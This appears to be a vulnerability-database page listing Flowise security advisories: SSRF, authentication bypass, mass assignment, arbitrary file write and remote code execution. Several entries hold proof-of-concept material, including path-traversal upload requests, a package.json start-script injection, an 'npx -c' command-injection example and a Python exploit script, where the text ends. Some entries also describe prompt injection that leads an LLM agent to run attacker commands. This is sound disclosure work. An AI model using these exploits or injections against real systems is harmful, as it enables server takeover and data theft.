Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the assistant update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating an assistant resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign assistants to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-d4wa-szeh-43ab
Aliases: CVE-2026-41267 GHSA-48m6-ch88-55mj |
Affected by 15 other vulnerabilities. |
|
|
VCID-dtss-epth-z7fh
Aliases: CVE-2026-31829 GHSA-fvcw-9w9r-pxc7 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.0.13, Flowise exposes an HTTP Node in AgentFlow and Chatflow that performs server-side HTTP requests using user-controlled URLs. By default, there are no restrictions on target hosts, including private/internal IP ranges (RFC 1918), localhost, or cloud metadata endpoints. This enables Server-Side Request Forgery (SSRF), allowing any user interacting with a publicly exposed chatflow to force the Flowise server to make requests to internal network resources that are inaccessible from the public internet. This vulnerability is fixed in 3.0.13. |
Affected by 41 other vulnerabilities. |
|
VCID-dzed-27rk-3qav
Aliases: CVE-2026-41273 GHSA-6f7g-v4pp-r667 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-e65e-s5sd-kuhp
Aliases: CVE-2026-41272 GHSA-2x8m-83vc-6wv4 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-ejdc-j73x-jydk
Aliases: CVE-2026-41269 GHSA-rh7v-6w34-w2rr |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-fu6t-9dk4-jbh9
Aliases: CVE-2026-40933 GHSA-c9gw-hvqq-f33r |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization from the “Custom MCP” configuration in http://localhost:3000/canvas - where any user can add a new MCP, when doing so - adding a new MCP using stdio, the user can add any command, even though your code have input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands - these commands, for example "npx" can be combined with code execution arguments ("-c touch /tmp/pwn") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-fwwa-7ark-rufb
Aliases: CVE-2024-37145 GHSA-858c-qxvx-rg9v |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available. |
Affected by 71 other vulnerabilities. |
|
VCID-gt6n-beak-33gy
Aliases: CVE-2026-46444 GHSA-hmg2-jjjx-jcp2 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, all CRUD endpoints for OpenAI Assistants Vector Store have no authentication middleware and the route path /api/v1/openai-assistants-vector-store is not in WHITELIST_URLS. However, it is also not protected by the main auth middleware when accessed via API key — the route requires API key auth (not whitelisted), but no permission checks exist on any operation. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-gver-jbrj-zqfu
Aliases: GHSA-h42x-xx2q-6v6g |
Flowise Pre-auth Arbitrary File Upload ## Summary An unauthorized attacker can leverage the whitelisted route `/api/v1/attachments` to upload arbitrary files when the `storageType` is set to **local** (default). ## Details When a new request arrives, the system first checks if the URL starts with `/api/v1/`. If it does, the system then verifies whether the URL is included in the whitelist (*whitelistURLs*). If the URL is whitelisted, the request proceeds; otherwise, the system enforces authentication. @ */packages/server/src/index.ts* ```typescript this.app.use(async (req, res, next) => { // Step 1: Check if the req path contains /api/v1 regardless of case if (URL_CASE_INSENSITIVE_REGEX.test(req.path)) { // Step 2: Check if the req path is case sensitive if (URL_CASE_SENSITIVE_REGEX.test(req.path)) { // Step 3: Check if the req path is in the whitelist const isWhitelisted = whitelistURLs.some((url) => req.path.startsWith(url)) if (isWhitelisted) { next() } else if (req.headers['x-request-from'] === 'internal') { basicAuthMiddleware(req, res, next) } else { const isKeyValidated = await validateAPIKey(req) if (!isKeyValidated) { return res.status(401).json({ error: 'Unauthorized Access' }) } next() } } else { return res.status(401).json({ error: 'Unauthorized Access' }) } } else { // If the req path does not contain /api/v1, then allow the request to pass through, example: /assets, /canvas next() } } ``` **The whitelist is defined as follows** ```typescript export const WHITELIST_URLS = [ '/api/v1/verify/apikey/', '/api/v1/chatflows/apikey/', '/api/v1/public-chatflows', '/api/v1/public-chatbotConfig', '/api/v1/prediction/', '/api/v1/vector/upsert/', '/api/v1/node-icon/', '/api/v1/components-credentials-icon/', '/api/v1/chatflows-streaming', '/api/v1/chatflows-uploads', '/api/v1/openai-assistants-file/download', '/api/v1/feedback', '/api/v1/leads', '/api/v1/get-upload-file', '/api/v1/ip', '/api/v1/ping', '/api/v1/version', '/api/v1/attachments', '/api/v1/metrics' ] ``` This means that every route in the whitelist does not require authentication. Now, let's examine the `/api/v1/attachments` route. @ */packages/server/src/routes/attachments/index.ts* ```typescript const router = express.Router() // CREATE router.post('/:chatflowId/:chatId', getMulterStorage().array('files'), attachmentsController.createAttachment) export default router ``` After several calls, the request reaches the `createFileAttachment` function @ (*packages/server/src/utils/createAttachment.ts*) Initially, the function retrieves *chatflowid* and *chatId* from the request without any additional validation. The only check performed is whether these parameters exist in the request. ```typescript const chatflowid = req.params.chatflowId if (!chatflowid) { throw new Error( 'Params chatflowId is required! Please provide chatflowId and chatId in the URL: /api/v1/attachments/:chatflowId/:chatId' ) } const chatId = req.params.chatId if (!chatId) { throw new Error( 'Params chatId is required! Please provide chatflowId and chatId in the URL: /api/v1/attachments/:chatflowId/:chatId' ) } ``` Next, the function retrieves the uploaded files and attempts to add them to the storage by calling the `addArrayFilesToStorage` function. ```typescript const files = (req.files as Express.Multer.File[]) || [] const fileAttachments = [] if (files.length) { // ... for (const file of files) { const fileBuffer = await getFileFromUpload(file.path ?? file.key) // get the uploaded file const fileNames: string[] = [] file.originalname = Buffer.from(file.originalname, 'latin1').toString('utf8') // add it to the storage const storagePath = await addArrayFilesToStorage(file.mimetype, fileBuffer, file.originalname, fileNames, chatflowid, chatId) // add it to the storage // ... await removeSpecificFileFromUpload(file.path ?? file.key) // delete from tmp // ... fileAttachments.push({ name: file.originalname, mimeType: file.mimetype, size: file.size, content }) } catch (error) { throw new Error(`Failed operation: createFileAttachment - ${getErrorMessage(error)}`) } } } return fileAttachments ``` Now lets take a look at `addArrayFilesToStorage` function @ (*/packages/components/src/storageUtils.ts*) ```typescript export const addArrayFilesToStorage = async (mime: string, bf: Buffer, fileName: string, fileNames: string[], ...paths: string[]) => { const storageType = getStorageType() const sanitizedFilename = _sanitizeFilename(fileName) if (storageType === 's3') { // ... } else { const dir = path.join(getStoragePath(), ...paths) // PATH TRAVERSAL. if (!fs.existsSync(dir)) { fs.mkdirSync(dir, { recursive: true }) } const filePath = path.join(dir, sanitizedFilename) fs.writeFileSync(filePath, bf) fileNames.push(sanitizedFilename) return 'FILE-STORAGE::' + JSON.stringify(fileNames) } } ``` As noted in the comment, to construct the directory, the function joins the output of the `getStoragePath` function with `...paths`, which are essentially the `chatflowid` and `chatId` extracted earlier from the request. However, as mentioned previously, these values are not validated to ensure they are UUIDs or numbers. As a result, an attacker could manipulate these variables to set the **dir** variable to any value. Combined with the fact that the filename is also provided by the user, this leads to **unauthenticated arbitrary file upload**. ## POC This is the a HTTP request. As observed, we are not authenticated, and by manipulating the `chatId` parameter, we can perform a path traversal. In this example, we overwrite the `api.json` file, which contains the API keys for the system.  > in this example, the **dir** variable will be ```typescript var dir = '/root/.flowise/storage/test/../../../../../../../../root/.flowise/' ``` > and the file name is `api.json` And the API Keys in the UI  ### Impact This vulnerability could potentially lead to * Remote Code Execution * Server Takeover * Data Theft And more | There are no reported fixed by versions. |
|
VCID-gvpx-4wkw-43cz
Aliases: GHSA-9hrv-gvrv-6gf2 |
Flowise Execute Flow function has an SSRF vulnerability ### Summary The attacker provides an intranet address through the base url field configured in the Execute Flow node → Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called) → Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services ### Details <img width="1280" height="860" alt="9a52a74e6fe2fd78e4962d1d68057fc2" src="https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23" /> Then initiate the call: ``` POST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json Authorization: Bearer apikey Content-Length: 17 {"question": "1"} ``` Server received a request: <img width="1432" height="172" alt="f45c757fec408e13739db068252ff21b" src="https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f" /> And there is an echo: <img width="1280" height="666" alt="fa0caf0deb306cfeeea8fdf8941a287e" src="https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f" /> Fix: Call secureFetch for verification ### Impact This is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: - Explore Internal Web Applications - Access sensitive management interfaces - Leak internal configuration, credentials, or confidential information This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments. |
Affected by 15 other vulnerabilities. |
|
VCID-hdej-umwh-kqav
Aliases: CVE-2026-46477 GHSA-5h9v-837x-m97r |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, dataset create and update mass-assignment allows cross-workspace dataset takeover. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-hep5-vndg-93e2
Aliases: GHSA-5cph-wvm9-45gj |
Flowise OverrideConfig security vulnerability ### Impact Flowise allows developers to inject configuration into the Chainflow during execution through the `overrideConfig` option. This is supported in both the frontend web integration and the backend Prediction API. This has a range of fundamental issues that are a **major** security vulnerability. While this feature is intentional, it should have strong protections added and be disabled by default. These issues include: 1. Remote code execution. While inside a sandbox this allows for 1. Sandbox escape 2. DoS by crashing the server 3. SSRF 2. Prompt Injection, both System and User 1. Full control over LLM prompts 2. Server variable and data exfiltration And many many more such as altering the flow of a conversation, prompt exfiltration via LLM proxying etc. These issues are self-targeted and do not persist to other users but do leave the server and business exposed. All issues are shown with the API but also work with the web embed. ### Workarounds - `overrideConfig` should be disabled by default - `overrideConfig` should have an explicit allow list of variables that are allowed to be modified. This way the user opts-in to where modifications can be made. - `vm2` and any forks of it should be removed as in the authors own words, "fixing the vulnerability seems impossible". The recommended replacement is https://www.npmjs.com/package/isolated-vm |
Affected by 66 other vulnerabilities. |
|
VCID-hfsz-bzgj-eyed
Aliases: CVE-2024-8181 GHSA-2q4w-x8h2-2fvh |
An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality. |
Affected by 68 other vulnerabilities. |
|
VCID-hg3m-1hzc-pydn
Aliases: CVE-2024-36421 GHSA-66f2-xxgm-f6xp |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, A CORS misconfiguration sets the Access-Control-Allow-Origin header to all, allowing arbitrary origins to connect to the website. In the default configuration (unauthenticated), arbitrary origins may be able to make requests to Flowise, stealing information from the user. This CORS misconfiguration may be chained with the path injection to allow an attacker attackers without access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available. |
Affected by 71 other vulnerabilities. |
|
VCID-hkfs-v3bp-kbh5
Aliases: CVE-2026-41265 GHSA-v38x-c887-992f |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-huvq-b7xz-sbf8
Aliases: CVE-2025-26319 GHSA-69jq-qr7w-j7qh |
FlowiseAI Flowise v2.2.6 was discovered to contain an arbitrary file upload vulnerability in /api/v1/attachments. | There are no reported fixed by versions. |
|
VCID-j5hh-haj2-qydg
Aliases: CVE-2026-41137 GHSA-9wc7-mj3f-74xv |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-jcze-eg2c-mkcf
Aliases: CVE-2026-30824 GHSA-5f53-522j-j454 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13. |
Affected by 41 other vulnerabilities. |
|
VCID-jmps-anck-eqdt
Aliases: GHSA-j44m-5v8f-gc9c |
Flowise is vulnerable to arbitrary file exposure through its ReadFileTool |
Affected by 51 other vulnerabilities. |
|
VCID-k579-xd81-hqdu
Aliases: CVE-2026-30821 GHSA-j8g8-j7fc-43v6 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the /api/v1/attachments/:chatflowId/:chatId endpoint is listed in WHITELIST_URLS, allowing unauthenticated access to the file upload API. While the server validates uploads based on the MIME types defined in chatbotConfig.fullFileUpload.allowedUploadFileTypes, it implicitly trusts the client-provided Content-Type header (file.mimetype) without verifying the file's actual content (magic bytes) or extension (file.originalname). Consequently, an attacker can bypass this restriction by spoofing the Content-Type as a permitted type (e.g., application/pdf) while uploading malicious scripts or arbitrary files. Once uploaded via addArrayFilesToStorage, these files persist in backend storage (S3, GCS, or local disk). This vulnerability serves as a critical entry point that, when chained with other features like static hosting or file retrieval, can lead to Stored XSS, malicious file hosting, or Remote Code Execution (RCE). This issue has been patched in version 3.0.13. |
Affected by 41 other vulnerabilities. |
|
VCID-kpyg-gve3-b3av
Aliases: CVE-2026-46475 GHSA-78pr-c5x5-jggc |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, assistant create and update mass-assignment allows cross-workspace assistant takeover. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-ksmv-s6c9-t7ap
Aliases: GHSA-jc5m-wrp2-qq38 |
Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint |
Affected by 41 other vulnerabilities. |
|
VCID-m3j3-4u39-euht
Aliases: CVE-2026-30823 GHSA-cwc3-p92j-g7qm |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13. |
Affected by 41 other vulnerabilities. |
|
VCID-nfun-ph7h-2qew
Aliases: GHSA-8vvx-qvq9-5948 |
Flowise allows arbitrary file write to RCE ### Summary An attacker could write files with arbitrary content to the filesystem via the `/api/v1/document-store/loader/process` API. An attacker can reach RCE(Remote Code Execution) via file writing. ### Details All file writing functions in [packages/components/src/storageUtils.ts](https://github.com/FlowiseAI/Flowise/blob/main/packages/components/src/storageUtils.ts) are vulnerable. - addBase64FilesToStorage - addArrayFilesToStorage - addSingleFileToStorage The fileName parameter, which is an untrusted external input, is being used as an argument to path.join() without verification. ```javascript const filePath = path.join(dir, fileName) fs.writeFileSync(filePath, bf) ``` Therefore, users can move to the parent folder via `../` and write files to any path. Once file writing is possible in all paths, an attacker can reach RCE (Remote Code Execution) in a variety of ways. In PoC (Proof of Concept), RCE was reached by overwriting package.json. ### PoC In PoC, `package.json` is overwritten. This is a scenario in which arbitrary code is executed when `pnpm start` is executed by changing the start command in the `scripts{}` statement to an arbitrary value. **- original start command** ```` "start": "run-script-os", ```` **- modify start command** ```` "start": "touch /tmp/pyozzi-poc && run-script-os", ```` When a user runs the `pnpm start` command, a `pyozzi-poc` file is created in the `/tmp` path. #### 1. package.json content base64 encoding ```json { "name": "flowise", "version": "1.8.2", "private": true, "homepage": "https://flowiseai.com", "workspaces": [ "packages/*", "flowise", "ui", "components" ], "scripts": { "build": "turbo run build && echo poc", "build-force": "pnpm clean && turbo run build --force", "dev": "turbo run dev --parallel", "start": "touch /tmp/pyozzi-poc && run-script-os", --> modify (add touch /tmp/pyozzi &&) "start:windows": "cd packages/server/bin && run start", "start:default": "cd packages/server/bin && ./run start", "clean": "pnpm --filter \"./packages/**\" clean", "nuke": "pnpm --filter \"./packages/**\" nuke && rimraf node_modules .turbo", "format": "prettier --write \"**/*.{ts,tsx,md}\"", "lint": "eslint \"**/*.{js,jsx,ts,tsx,json,md}\"", "lint-fix": "pnpm lint --fix", "quick": "pretty-quick --staged", "postinstall": "husky install", "migration:create": "pnpm typeorm migration:create" }, ... skip ``` #### 2. Overwrite `package.json` via `/api/v1/document-store/loader/process` <img width="1329" alt="image" src="https://github.com/FlowiseAI/Flowise/assets/86613161/a548732d-4bee-4cd0-8565-54fb8e560500"> > **Request Body** ```json { "loaderId": "textFile", "storeId": "c4b8a8fb-9eb6-47ae-9caa-7702ef8baabb", "loaderName": "Text File", "loaderConfig": { "txtFile": "data:text/plain;BASE64_ENCODEING_CONTENT,filename:/../../../../../usr/src/package.json", "textSplitter": "", "metadata": "", "omitMetadataKeys": "" } } ``` The part after `filename:` of the `txtFile` parameter is the value used as `fileName` in the function. Add `../` to the filename value to move to the top path, then specify `package.json` in the project folder `/usr/src/` as the path. <img width="663" alt="image" src="https://github.com/FlowiseAI/Flowise/assets/86613161/13fdc756-f4d3-45f9-9929-fd978f532a02"> Afterwards, when the user starts the server (`pnpm start`), the added script will be executed. (`touch /tmp/pyozzi-poc`) **- starting server with `touch /tmp/pyozzi-poc` command** <img width="737" alt="image" src="https://github.com/FlowiseAI/Flowise/assets/86613161/341be379-43ca-4acc-9126-dc398475fcf3"> **- `/tmp/pyozzi-poc` file created** <img width="751" alt="image" src="https://github.com/FlowiseAI/Flowise/assets/86613161/15707068-c000-4d59-972d-89d969c27087"> ### Impact **Remote Code Execution (RCE)** Although it is demonstrated here using the file creation command, you can obtain full server shell privileges by opening a reverse shell. | There are no reported fixed by versions. |
|
VCID-pzza-9xq9-a7de
Aliases: CVE-2026-41268 GHSA-cvrr-qhgw-2mm6 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the FILE-STORAGE:: keyword combined with a NODE_OPTIONS environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-qgs1-hazv-67b8
Aliases: CVE-2025-61913 GHSA-jv9m-vf54-chjj |
Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability. |
Affected by 51 other vulnerabilities. |
|
VCID-qm89-q2ar-uyhy
Aliases: CVE-2026-46479 GHSA-mq53-pc65-wjc4 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluation create and update mass-assignment allows cross-workspace evaluation takeover. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-r74e-k86f-7qgb
Aliases: CVE-2026-46476 GHSA-728h-4mwj-f2p4 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, CustomTemplate create and update mass-assignment allows cross-workspace template takeover. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-rgmv-6bqh-eqf2
Aliases: CVE-2026-41271 GHSA-6r77-hqx7-7vw8 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) vulnerability exists in FlowiseAI's POST/GET API Chain components that allows unauthenticated attackers to force the server to make arbitrary HTTP requests to internal and external systems. By injecting malicious prompt templates, attackers can bypass the intended API documentation constraints and redirect requests to sensitive internal services, potentially leading to internal network reconnaissance and data exfiltration. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-rkaz-75t9-r3gs
Aliases: GHSA-7rgr-72hp-9wp3 |
Duplicate Advisory: Flowise is vulnerable to stored XSS via "View Messages" allows credential theft in FlowiseAI admin panel |
Affected by 66 other vulnerabilities. |
|
VCID-rmdv-d7a4-c3h7
Aliases: CVE-2024-8182 GHSA-48x4-mx8f-gr4h |
An Unauthenticated Denial of Service (DoS) vulnerability exists in Flowise version 1.8.2 leading to a complete crash of the instance running a vulnerable version due to improper handling of user supplied input to the “/api/v1/get-upload-file” api endpoint. |
Affected by 68 other vulnerabilities. |
|
VCID-s3jg-wce1-fbf3
Aliases: CVE-2026-46480 GHSA-wxrr-jp8m-qq7f |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluator create and update mass-assignment allows cross-workspace evaluator takeover. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-t5jg-qrw2-aqcv
Aliases: GHSA-wq95-wr7m-26h4 |
Duplicate Advisory: Flowise Stored XSS vulnerability through logs in chatbot |
Affected by 66 other vulnerabilities. |
|
VCID-t839-eydz-1ud4
Aliases: CVE-2025-8943 GHSA-2vv2-3x8x-4gv7 |
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands. | There are no reported fixed by versions. |
|
VCID-tdm1-91mc-8kgr
Aliases: GHSA-cc4f-hjpj-g9p8 |
Flowise: Weak Default JWT Secrets **Detection Method:** Kolega.dev Deep Code Scan | Attribute | Value | |---|---| | Severity | Critical | | Location | packages/server/src/enterprise/middleware/passport/index.ts:29-34 | | Practical Exploitability | High | | Developer Approver | faizan@kolega.ai | ### Description JWT secrets have weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER'). Attackers can forge valid JWTs and impersonate any user. ### Affected Code ``` const jwtAudience = process.env.JWT_AUDIENCE || 'AUDIENCE' const jwtIssuer = process.env.JWT_ISSUER || 'ISSUER' const jwtAuthTokenSecret = process.env.JWT_AUTH_TOKEN_SECRET || 'auth_token' const jwtRefreshSecret = process.env.JWT_REFRESH_TOKEN_SECRET || process.env.JWT_AUTH_TOKEN_SECRET || 'refresh_token' ``` ### Evidence All JWT defaults are weak strings. Refresh token falls back to auth token which is a design flaw. If any environment variable is unset, weak default is used. ### Impact Complete authentication bypass. Attackers can forge valid JWTs for any user account. No authentication required to access protected endpoints. Can escalate to admin access. ### Recommendation Remove all default secrets - require all JWT environment variables to be explicitly set. Add startup validation throwing error if any JWT secret is missing. Use cryptographically random secrets (256+ bits) for each secret independently. Implement JWT secret rotation mechanism. ### Notes The JWT secrets have genuinely weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER') at lines 29-34. If an administrator deploys without setting the environment variables JWT_AUTH_TOKEN_SECRET, JWT_REFRESH_TOKEN_SECRET, JWT_AUDIENCE, and JWT_ISSUER, the application will use these trivially guessable values. An attacker knowing these defaults (which are publicly visible in the source code) can forge valid JWTs to impersonate any user, including administrators. The fallback chain at line 34 where jwtRefreshSecret falls back to jwtAuthTokenSecret is an additional design weakness - if only JWT_AUTH_TOKEN_SECRET is set, both tokens share the same secret. While .env.example files provide placeholder values, these are also weak and publicly visible. The application should fail to start if these secrets are not explicitly configured with strong values, rather than silently falling back to insecure defaults. |
Affected by 15 other vulnerabilities. |
|
VCID-v1nz-wwsu-qycg
Aliases: CVE-2026-41270 GHSA-xhmj-rg95-44hv |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-v9hg-7pex-g3dp
Aliases: GHSA-w6v6-49gh-mc9w |
Flowise: Path Traversal in Vector Store basePath ## Summary The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem. ## Vulnerability Details | Field | Value | |-------|-------| | Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) | | Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) | ## Prerequisites 1. **Authentication**: Valid API token with `documentStores:upsert-config` permission 2. **Document Store**: An existing Document Store with at least one processed chunk 3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key) ## Root Cause ### Faiss (`Faiss.ts`) ```typescript async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled // ... const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings) await vectorStore.save(basePath) // Direct filesystem write, no validation } ``` ### SimpleStore (`SimpleStore.ts`) ```typescript async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled let filePath = '' if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex') else filePath = basePath // Used directly without sanitization const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path } ``` ## Impact An authenticated attacker can: 1. **Write files to arbitrary locations** on the server filesystem 2. **Overwrite existing files** if the process has write permissions 3. **Potential for code execution** by writing to web-accessible directories or startup scripts 4. **Data exfiltration** by writing to network-mounted filesystems ## Proof of Concept ### poc.py ```python #!/usr/bin/env python3 """ POC: Path Traversal in Vector Store basePath (CWE-22) Usage: python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID> """ import argparse import json import urllib.request import urllib.error def post_json(url, data, headers): req = urllib.request.Request( url, data=json.dumps(data).encode("utf-8"), headers={**headers, "Content-Type": "application/json"}, method="POST", ) with urllib.request.urlopen(req, timeout=120) as resp: return resp.status, resp.read().decode("utf-8", errors="replace") def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True) ap.add_argument("--token", required=True) ap.add_argument("--store-id", required=True) ap.add_argument("--credential", required=True) ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc") args = ap.parse_args() payload = { "storeId": args.store_id, "vectorStoreName": "faiss", "vectorStoreConfig": {"basePath": args.base_path}, "embeddingName": "openAIEmbeddings", "embeddingConfig": {"credential": args.credential}, } url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert" headers = {"Authorization": f"Bearer {args.token}"} try: status, body = post_json(url, payload, headers) print(body) except urllib.error.HTTPError as e: print(e.read().decode()) if __name__ == "__main__": main() ``` ### Setup 1. Create a Document Store in Flowise UI 2. Add a Document Loader (e.g., Plain Text) with any content 3. Click "Process" to create chunks 4. Note the Store ID from the URL 5. Get your embedding credential ID from Settings → Credentials ### Exploitation ```bash # Write to /tmp python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path /tmp/flowise-pwned # Path traversal variant python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path "../../../../tmp/traversal-test" ``` ### Evidence ``` $ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned 